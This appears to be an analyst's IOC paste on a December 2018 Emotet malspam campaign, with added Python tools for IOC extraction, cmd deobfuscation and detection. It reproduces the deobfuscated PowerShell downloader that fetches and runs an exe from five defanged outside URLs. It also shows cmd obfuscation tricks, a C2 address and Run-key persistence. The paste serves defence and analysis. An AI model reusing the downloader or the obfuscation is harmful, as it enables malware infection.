VRad

#emotet_201218

Dec 23rd, 2018
#IOC #OptiData #VR #emotet #feodo #W97M #powershell

https://pastebin.com/EejcbL4t

previous contact:
04/12/18 https://pastebin.com/znQDtbnt
09/11/18 https://pastebin.com/THHMs2wg
01/10/18 https://pastebin.com/Y6DnbpHv

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
https://kc.mcafee.com/corporate/index?page=content&id=KB90108

attack_vector
--------------
email attach .doc > macro > cmd > powershell > GET (first of 5 URLs returning >= 80000 bytes) > %temp%\***.exe

email_headers
--------------
Received: from server.arroyo.bz (server.arroyo.bz [65.60.8.150])
by srv8.victim1.com for <user0@org7.kv.victim1.com>;
Thu, 20 Dec 2018 20:00:26 +0200 (EET)
(envelope-from veronicat@mccell.com.mx)
Received: from [138.122.96.73] (port=56726 helo=10.15.31.100)
by server.arroyo.bz (Exim 4.91)
for user0@org7.kv.victim1.com; Thu, 20 Dec 2018 12:00:07 -0600
Date: Thu, 20 Dec 2018 12:00:40 -0600
From: Вячеслав Прендзевский <prom@pride-ukraine.com.ua> <veronicat@mccell.com.mx>
To: user0@org7.kv.victim1.com
Subject: Вячеслав Прендзевский - Invoice 85841

files
--------------
SHA-256 bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80
File name Inv85841.doc
File size 144.5 KB

SHA-256 270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1
File name pEakCmvuBiB.exe
File size 536 KB

activity
**************

deobfuscated_macro
--------------
powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';

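The one-liner above is the standard Emotet downloader of this period: five URLs joined by '@', a loop that tries each in turn, a size check (-ge 80000) so a 404 page or a sandbox's dummy response is not executed, and a handful of junk assignments ($o497, $c691, ...) that are never read. The script below is an added example, not part of the paste, that pulls the IOC-bearing pieces out of such a one-liner automatically: the URL list (refanged from the " {.}" defanging used here), the drop name in %TEMP%, the size threshold, the execution primitive, and the noise variables. ONE_LINER is the paste's own macro text; the regexes and field names are this example's.

```python
import re
from urllib.parse import urlparse

# The deobfuscated downloader exactly as the paste shows it, i.e. with the
# URLs defanged by " {.}" / "{.}"; the live macro used plain dots.
ONE_LINER = (
    "powershell $o497='G112';$E633=new-object Net.WebClient;"
    "$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6"
    "@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl"
    "@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';"
    "$U974='p613';$B338=$env:temp+'\\'+$V107+'.exe';foreach($o680 in $Q470){try{"
    "$E633.DownloadFile($o680, $B338);$j643='Z181';"
    "If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}"
    "catch{}}$k418='W330';"
)

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")                  # $name = 'literal'
URLLIST_RE = re.compile(r"\$(\w+)='([^']*)'\.Split\('@'\)")          # the '@'-joined URL list
DROP_RE = re.compile(r"\$(\w+)=\$env:temp\+'\\'\+\$(\w+)\+'\.exe'", re.I)  # %TEMP%\<var>.exe
SIZE_RE = re.compile(r"\.length\s+-ge\s+(\d+)", re.I)
EXEC_RE = re.compile(r"\b(Invoke-Item|Start-Process|IEX|Invoke-Expression)\b", re.I)


def refang(url: str) -> str:
    """Undo the paste's defanging so the URL can be matched against proxy logs."""
    return url.replace(" ", "").replace("{.}", ".")


def extract_downloader(script: str) -> dict:
    """Pull the IOC-bearing pieces out of an Emotet-style PowerShell downloader."""
    strings = dict(ASSIGN_RE.findall(script))
    refs = re.findall(r"\$(\w+)", script)                      # every $name reference
    noise = sorted(v for v in strings if refs.count(v) == 1)   # assigned once, never read

    m = URLLIST_RE.search(script)
    urls = [refang(u) for u in m.group(2).split("@")] if m else []

    d = DROP_RE.search(script)
    drop_name = (strings.get(d.group(2), "?") + ".exe") if d else None

    s = SIZE_RE.search(script)
    e = EXEC_RE.search(script)
    return {
        "urls": urls,
        "hosts": [urlparse(u).hostname for u in urls],
        "drop_name": drop_name,                        # written to %TEMP%
        "min_size": int(s.group(1)) if s else None,    # smaller downloads: loop moves to next URL
        "exec": e.group(1) if e else None,
        "noise_vars": noise,
    }


if __name__ == "__main__":
    for k, v in extract_downloader(ONE_LINER).items():
        print(f"{k}: {v}")
```

The size check is the detail worth remembering when detonating samples: a payload host that is already taken down and answers with a small error page does not trigger execution, so a sandbox that intercepts DNS and serves a short dummy file will show the loop walking all five URLs and running nothing.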
pl_src: 1/5
--------------
h11p:\ opewinsng {.}com/bOiANyEc 404
h11p:\ chamanga {.} org {.}uy/eE9DiHE6 200
h11p:\ ideagold {.}by/rzb6hSlC3 403
h11p:\ onetechblog{.} tek1{.} top/MyZztFl 403
h11p:\ maxclean{.} srv {.}br/QVtDDcAZ 404

C2:
--------------
http://189.226.214.129:8080/

netwrk
--------------
1.22.119.250 1.22.119.250 GET / HTTP/1.1 Mozilla/4.0

comp
--------------

stgintel.exe 2224 189.226.214.129 8080 SYN_SENT
stgintel.exe 2224 200.124.225.32 80 SYN_SENT
stgintel.exe 2224 70.80.135.35 8443 SYN_SENT
stgintel.exe 2224 201.102.7.208 8443 SYN_SENT
stgintel.exe 2224 189.222.245.247 80 SYN_SENT
stgintel.exe 2224 1.22.119.250 80 ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

c:\c556902829965\u3692599496166\i47356399652\..\..\..\windows\system32\cmd.exe /c %PrOgraMdatA:...

CmD /V: /R " seT gali=;'033W'=814k$}}{hctac}};kaerb;'713Y'=636a$;833B$ metI-ekovnI{ )00008...

C:\Windows\system32\cmd.exe /S /D /c" EchO pow%PUBLIC:~5,1%r%SESSIONNAME:...

Cmd.EXe

powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';

C:\tmp\583.exe

C:\Users\operator\AppData\Local\stgintel\stgintel.exe

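The cmd.exe stages in the proc list hide the word "powershell" and the script body with two cmd tricks: %VAR:~start,len% substring expansion (the %PUBLIC:~5,1% and %PrOgraMdatA:... pieces, each yielding one character of a common environment value), and a reversed copy of the PowerShell stored with "seT gali=" under delayed expansion (/V:) and read back last-character-first. The helper below is an added example, not from the paste: it emulates cmd's substring expansion against an assumed set of default Windows environment values and reverses the fragment that is visible on the page. SAMPLE_ECHO is a constructed line modeled on the truncated EchO line (its offsets after %SESSIONNAME are this example's); the page's own cut-off lines are left as they are.

```python
import re

# %VAR:~start[,len]% as cmd.exe expands it: a negative start counts from the end
# of the value, a negative len drops that many trailing characters instead of
# taking a fixed count, and an omitted len runs to the end.
SUBSTR_RE = re.compile(r"%([A-Za-z_][\w()]*):~(-?\d+)(?:,(-?\d+))?%")


def expand_cmd_substrings(cmdline: str, env: dict) -> str:
    table = {k.upper(): v for k, v in env.items()}   # cmd variable names are case-insensitive

    def repl(m: re.Match) -> str:
        name, start, length = m.group(1).upper(), int(m.group(2)), m.group(3)
        if name not in table:
            return m.group(0)       # left literal so the analyst sees what is still unresolved
        val = table[name]
        n = len(val)
        s = n + start if start < 0 else start
        s = max(0, min(s, n))
        if length is None:
            e = n
        else:
            ln = int(length)
            e = s + ln if ln >= 0 else n + ln
        return val[s:e] if e > s else ""

    return SUBSTR_RE.sub(repl, cmdline)


def reverse_payload(fragment: str) -> str:
    """The 'seT gali=' string is the PowerShell written backwards; undo it."""
    return fragment[::-1]


# Assumed values: Windows defaults for a local console logon as user 'operator'.
# Real values come from the victim host; only the first two matter for the sample.
ASSUMED_ENV = {
    "PUBLIC": r"C:\Users\Public",
    "SESSIONNAME": "Console",
    "TMP": r"C:\Users\operator\AppData\Local\Temp",
    "PROGRAMDATA": r"C:\ProgramData",
}

# Constructed sample modeled on the truncated EchO line; the offsets are ours.
SAMPLE_ECHO = "EchO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TMP:~-3,1%ll"

# The visible start of the reversed string from the 'seT gali=' line, verbatim.
REVERSED_FRAGMENT = ";'033W'=814k$}}{hctac}};kaerb;'713Y'=636a$;833B$ metI-ekovnI{ )00008"


if __name__ == "__main__":
    print(expand_cmd_substrings(SAMPLE_ECHO, ASSUMED_ENV))
    print(reverse_payload(REVERSED_FRAGMENT))
```

Two caveats when reproducing this on a real command line: cmd only leaves an undefined variable literal in an interactive session (inside a batch file it expands to nothing), and %SESSIONNAME% exists only for interactive logons, so a sample that builds "powershell" from it falls apart when run from a service context or some sandboxes. Collect the environment from the victim host, or from a matching VM, before trusting the expanded result.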
persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 23.12.2018 13:19
stgintel
TortoisePlink http://tortoisesvn.net
c:\users\operator\appdata\local\stgintel\stgintel.exe 22.12.2018 16:05

drop
--------------
C:\tmp\583.exe
C:\Users\operator\AppData\Local\stgintel\stgintel.exe

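Every stage in the proc and persist lists above is visible in ordinary process-creation and registry telemetry (Sysmon event IDs 1 and 13, or the EDR equivalent), and the chain is far more telling than any single line. The rule set below is an added example, not part of the paste, written over a constructed event list modeled on those lists: WINWORD spawning cmd.exe through a path with \..\ segments and %VAR:~n,m% expansion, cmd /V: with a reversed "set", PowerShell with DownloadFile followed by Invoke-Item, an exe started from %TEMP%, and an HKCU Run value pointing at AppData\Local\<name>\<name>.exe. Event fields, rule names and the abridged command lines are this example's.

```python
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify_process(ev: dict) -> list:
    """Rule names tripped by one process-creation event (parent_image, image, cmdline)."""
    hits = []
    parent, image, cl = basename(ev["parent_image"]), basename(ev["image"]), ev["cmdline"]
    if parent in OFFICE and image in SHELLS:
        hits.append("office_spawned_shell")
    if re.search(r"\\\.\.\\", ev["image"]):                      # c:\c55...\..\..\..\windows\system32\cmd.exe
        hits.append("dot_dot_traversal_in_image_path")
    if re.search(r"%\w+:~-?\d+(?:,-?\d+)?%", cl):                  # %PUBLIC:~5,1%
        hits.append("cmd_envvar_substring_obfuscation")
    if re.search(r"(?i)\s/V:?\s.*\bset\s+\w+=", cl):               # CmD /V: /R " seT gali=...
        hits.append("cmd_delayed_expansion_set")
    if re.search(r"(?i)downloadfile", cl) and re.search(r"(?i)invoke-item|start-process|\biex\b", cl):
        hits.append("ps_download_then_execute")
    if re.search(r"(?i)\\(?:temp|tmp)\\[^\\]+\.exe$", ev["image"]):
        hits.append("exe_run_from_temp")
    return hits


def classify_run_key(ev: dict) -> list:
    """HKCU Run value whose data is AppData\\Local\\<name>\\<name>.exe and whose value name matches."""
    hits = []
    key = ev["key"].upper()
    if key.startswith("HKCU\\") and key.endswith("\\RUN"):
        m = re.search(r"\\appdata\\local\\([^\\]+)\\([^\\]+)\.exe$", ev["value_data"].lower())
        if m and m.group(1) == m.group(2) == ev["value_name"].lower():
            hits.append("hkcu_run_selfnamed_appdata_local_exe")
    return hits


def triage(events: list, run_keys: list) -> list:
    """Union of rules over the whole chain; alert on the combination, not on one hit."""
    hits = set()
    for ev in events:
        hits.update(classify_process(ev))
    for rk in run_keys:
        hits.update(classify_run_key(rk))
    return sorted(hits)


# Constructed events modeled on the proc list; command lines are abridged where
# the page's own lines are truncated (the text after "/c" on the first one is ours).
WORD = r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
CMD_TRAV = r"c:\c556902829965\u3692599496166\i47356399652\..\..\..\windows\system32\cmd.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"parent_image": WORD, "image": CMD_TRAV, "cmdline": CMD_TRAV + " /c %PROGRAMDATA:~0,1%"},
    {"parent_image": CMD_TRAV, "image": CMD,
     "cmdline": "CmD /V: /R \" seT gali=;'033W'=814k$}}{hctac}}"},
    {"parent_image": CMD, "image": PS,
     "cmdline": "powershell $E633=new-object Net.WebClient; ... $E633.DownloadFile($o680, $B338); ... Invoke-Item $B338"},
    {"parent_image": PS, "image": r"C:\tmp\583.exe", "cmdline": r"C:\tmp\583.exe"},
    {"parent_image": r"C:\tmp\583.exe", "image": r"C:\Users\operator\AppData\Local\stgintel\stgintel.exe",
     "cmdline": r"C:\Users\operator\AppData\Local\stgintel\stgintel.exe"},
]
RUN_KEY_EVENT = {
    "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "value_name": "stgintel",
    "value_data": r"c:\users\operator\appdata\local\stgintel\stgintel.exe",
}

if __name__ == "__main__":
    for ev in EVENTS:
        print(basename(ev["image"]), classify_process(ev))
    print(triage(EVENTS, [RUN_KEY_EVENT]))
```

The "TortoisePlink http://tortoisesvn.net" column in the Run entry is what the autoruns-style tool read from the dropped file's own version resource; it names a legitimate open-source tool and says nothing about where stgintel.exe came from, so do not let a recognisable description or publisher URL allowlist a Run value that points into AppData\Local.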
VR

# # #
https://www.virustotal.com/#/file/bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80/details
https://www.virustotal.com/#/file/270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1/details
https://analyze.intezer.com/#/analyses/9142da6d-ba72-4ff1-a515-5b187735a162